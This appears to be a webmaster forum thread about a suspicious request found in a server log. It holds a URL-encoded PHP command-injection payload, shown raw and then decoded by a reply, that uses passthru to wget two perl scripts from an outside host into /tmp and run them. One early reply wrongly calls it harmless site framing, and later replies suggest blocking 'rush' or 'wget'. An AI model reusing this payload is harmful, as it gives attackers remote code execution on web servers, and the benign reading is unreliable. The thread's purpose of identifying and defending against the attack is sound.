You should exemplify your domain per TOS [webmasterworld.com]:

http://example.com
or
http://mydomain.com

Sorry - I just copied and pasted it UNEDITED from my Analog report. Here it is again - can anyone identify it?

/blog/index.php?cat=4&rush=echo%20_START_%3B%20cd%20/tmp;wget%20server2.norcomp.no/~private/a.txt;wget%20server2.norcomp.no/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20echo%20_END_&highlight=%2527.passthru%28$HTTP_GET_VARS%5Brush%5D%29.%2527%27;

I'm no PHP whiz, but it appears that someone is serving up your webpage from info in their directory. This is not necessarily a negative move. Many sites use something like this (example: about.com) to let users see a particular site without letting that user leave their own site.

Try a reverse DNS [dnsstuff.com] to see who is at work here. If it bothers you, ban their IPs from accessing your files.

I am quite sure this IS an attack. If you decode the %% values by the ASCII values the represent, you get a shell script. They pull two perl scripts from a server, then execute these scripts in perl.

echo _START_;
cd /tmp;
wget sss.#*$!.tld/~private/a.txt;
wget sss.xxx.tld/~private/w.txt;
perl a.txt;
rm a.txt;
perl w.txt;
rm w.txt;
echo _END_&highlight=%'.passthru($HTTP_GET_VARS[rush]).%'';

I did some further investigation.

According to sources outside WW this seems to be a variant of a worm circulating to attack phpBB and other php based websites. Some sources suggest you block all requests with "rush" in the string in the .htaccess file, but other sources claim that this is just one variant and it can easily mutate to another unrecognizable form, so blocking everything with "rush" doesn't work.

I block "wget"